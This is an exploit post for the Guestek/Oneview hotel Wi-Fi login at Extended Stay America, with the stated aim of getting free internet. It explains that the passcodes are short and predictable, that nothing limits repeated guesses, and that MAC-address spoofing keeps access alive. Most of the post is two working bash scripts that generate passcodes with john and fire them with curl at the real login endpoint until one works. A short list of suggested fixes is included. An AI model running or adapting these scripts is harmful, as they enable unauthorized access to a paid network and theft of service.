# Exploit Title: Guestek / Oneview – Extended Stay 5 dollar crack
# Date: 2012-01-04 ( The end is near!! )
# Author: Skraps, Jackie Craig Sparks(jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: https://login.globalsuite.net
# Version: 2 (tested), same idea works on older systems
# Spamvertise: https://www.facebook.com/Boycottcpanel – Join the boycott
This is a popular login system for Extended Stay of America hotels. Basically every since I was 21 they always started their passcodes with the letter D. They are also 4 characters in length and always in uppercase letters. So That leaves us with a little less than 45000 possibilities that our passcode could be. The guestek system also uses does not protect against brute force attacks. So with the fail script below in a matter of 3-4 hours or less we can slam it 10-15 passcodes a second. With out degrading system performance. Then within the 4 hours at some point we have free internet.
They also use mac address whitelisting so the code changed on Jan 1st but I’ve still been able to connect since then doing my testing by changing my mac address.
The solution use stronger passcodes, also add bruteforce protection so after 20 failed attempts(I have made over 100k while testing) block the mac address, set a cookie also with a code so the web app knows not to allow access to the login prompt. Make mac address whitelist clear after 24 hours and use a cookie on the clients box to verify user before adding them back to the mac white list.
——PoC——
Script needs curl( curl.haxx.se ) and john the ripper ( http://www.openwall.com/john ) .
usage – ./oneveiw.sh – then just wait.
oneview.sh-
#!/bin/bash
curl -s –location https://login.globalsuite.net/v2/Login
count=0
pcount=0
pmax=30
[ ! -e ./oneviewdebug ] && mkdir debug
[ -e ./oneviewpass ] && rm oneviewpass
for a in `john –incremental:alnum –stdout:3 | tr ‘[a-z]’ ‘[A-Z]’`;do
if [ ${#a} -gt 2 ]; then
./curloneview.sh D${a} &
count=$(($count + 1))
pcount=`ps aux | grep curl | wc -l`
if (( $pcount > $pmax )); then
sleep 2
fi
if [ -e ./oneviewpass ];then
echo “Password found”;
cat ./oneviewpass
rm -fr ./oneviewdebug
exit
fi
fi
done
[ -e ./debug ] && rm -fr ./oneviewdebug
–EOF–
curloneview.sh-
#!/bin/bash
pass=”$1″;
echo -ne “Trying ${pass} \r”
function curlit(){
curl -s -d “passcode=${pass}&firstname=joe&lastname=swanson&companyname=help%40juno.com” –output “./oneviewdebug/${pass}output.txt” –referer https://login.globalsuite.net/v2/Login –location https://login.globalsuite.net/v2/globalnet/ProcessPasscode
}
function chkpass(){
chk=`grep “#alert-error#_#AJAX#_# Invalid passcode entered” ./oneviewdebug/${pass}output.txt`
if [ “$chk” != “#alert-error#_#AJAX#_# Invalid passcode entered” ];then
echo “Password is ${pass}”
echo ${pass} > ./oneviewpass
fi
}
while [ ! -e “./oneviewdebug/${pass}output.txt” ]; do
curlit
done
chkpass
The ramblings of a mad penguin 